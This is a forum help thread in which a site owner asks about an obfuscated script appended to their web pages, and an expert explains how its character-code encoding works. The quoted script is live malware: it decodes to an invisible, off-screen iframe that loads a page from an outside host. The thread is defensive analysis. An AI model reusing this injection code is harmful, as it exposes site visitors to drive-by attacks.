We help IT Professionals succeed at work.

Javascript Added to bottom of site - Virus

jimbinho
jimbinho asked
on
371 Views
Last Modified: 2013-12-09
Hi All,

Hoping someone can answer this, the following code is getting added to the bottom of our site and it does look like a virus. Does anyone know what it is or how it is getting there. Just so you know, it is not on our local files and is only on the remote. Any info will be appreciated.



</html><script type="text/javascript">var gBhwGdGvEUgyLteZaNBv = "RvA60RvA105RvA102RvA114RvA97RvA109RvA101RvA32RvA119RvA105RvA100RvA116RvA104RvA61RvA34RvA52RvA56RvA48RvA34RvA32RvA104RvA101RvA105RvA103RvA104RvA116RvA61RvA34RvA54RvA48RvA34RvA32RvA115RvA114RvA99RvA61RvA34RvA104RvA116RvA116RvA112RvA58RvA47RvA47RvA112RvA114RvA111RvA102RvA105RvA116RvA111RvA111RvA108RvA116RvA105RvA112RvA46RvA98RvA105RvA122RvA47RvA98RvA108RvA111RvA103RvA47RvA102RvA101RvA101RvA100RvA46RvA104RvA116RvA109RvA108RvA34RvA32RvA115RvA116RvA121RvA108RvA101RvA61RvA34RvA98RvA111RvA114RvA100RvA101RvA114RvA58RvA48RvA112RvA120RvA59RvA32RvA112RvA111RvA115RvA105RvA116RvA105RvA111RvA110RvA58RvA114RvA101RvA108RvA97RvA116RvA105RvA118RvA101RvA59RvA32RvA116RvA111RvA112RvA58RvA48RvA112RvA120RvA59RvA32RvA108RvA101RvA102RvA116RvA58RvA45RvA53RvA48RvA48RvA112RvA120RvA59RvA32RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA59RvA32RvA102RvA105RvA108RvA116RvA101RvA114RvA58RvA112RvA114RvA111RvA103RvA105RvA100RvA58RvA68RvA88RvA73RvA109RvA97RvA103RvA101RvA84RvA114RvA97RvA110RvA115RvA102RvA111RvA114RvA109RvA46RvA77RvA105RvA99RvA114RvA111RvA115RvA111RvA102RvA116RvA46RvA65RvA108RvA112RvA104RvA97RvA40RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA61RvA48RvA41RvA59RvA32RvA45RvA109RvA111RvA122RvA45RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA34RvA62RvA60RvA47RvA105RvA102RvA114RvA97RvA109RvA101RvA62";var tFWwuHhNLrortVozzuuD = gBhwGdGvEUgyLteZaNBv.split("RvA");var OaCaUhzuuBpnGMjBTROe = "";for (var IDWCYKBYFvcTWeuqLukF=1; IDWCYKBYFvcTWeuqLukF<tFWwuHhNLrortVozzuuD.length; IDWCYKBYFvcTWeuqLukF++){OaCaUhzuuBpnGMjBTROe+=String.fromCharCode(tFWwuHhNLrortVozzuuD[IDWCYKBYFvcTWeuqLukF]);}document.write(OaCaUhzuuBpnGMjBTROe)</script>

Open in new window

Comment
Watch Question

HonorGodSoftware Engineer
CERTIFIED EXPERT

Commented:
Yes, it is a virus.

How did it get there?  I don't know.

Remove it...

Author

Commented:
Hi,

Thanks for this. I think to be more specific what i am looking for is: what the code does when scrambled as i am assuming it is scrambled java script. I would also like to know how anyone would do this and if anyone has seen anything like this before can they shed any light?

Thanks
HonorGodSoftware Engineer
CERTIFIED EXPERT

Commented:
here is what it translates as...
iframeCode.jpg
HonorGodSoftware Engineer
CERTIFIED EXPERT

Commented:
How would someone do this?

Well, they would first figure out what they want to generate (e.g., the "iframe" shown above), then put that in a string, and convert the individual characters into numeric values.  For example, using something like the code shown below.

Then, they would take the numbers, and put them into an array, and from the array, create a string.

... does that make sense?



<html>
<body>
 
<script type="text/javascript">
 
var str='<iframe width="480"'
for ( var i = 0; i < str.length; i++ ) {
  document.write( str[ i ] + ' = ' + str.charCodeAt( i ) + '<br />')
}
</script>
 
</body>
</html>

Open in new window

Author

Commented:
Hi,

Thanks for this. My question is not so much how they created the string, but how it is likely to get onto our site. Thanks for your help.
Software Engineer
CERTIFIED EXPERT
Commented:
This one is on us!
(Get your first solution completely free - no credit card required)
UNLOCK SOLUTION

Author

Commented:
Appreciate the help
HonorGodSoftware Engineer
CERTIFIED EXPERT

Commented:
Thanks for the grade & points.  I'm sorry that you didn't feel the information warranted an A.

Good luck & have a great day
Unlock the solution to this question.
Join our community and discover your potential

Experts Exchange is the only place where you can interact directly with leading experts in the technology field. Become a member today and access the collective knowledge of thousands of technology experts.

*This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

OR

Please enter a first name

Please enter a last name

8+ characters (letters, numbers, and a symbol)

By clicking, you agree to the Terms of Use and Privacy Policy.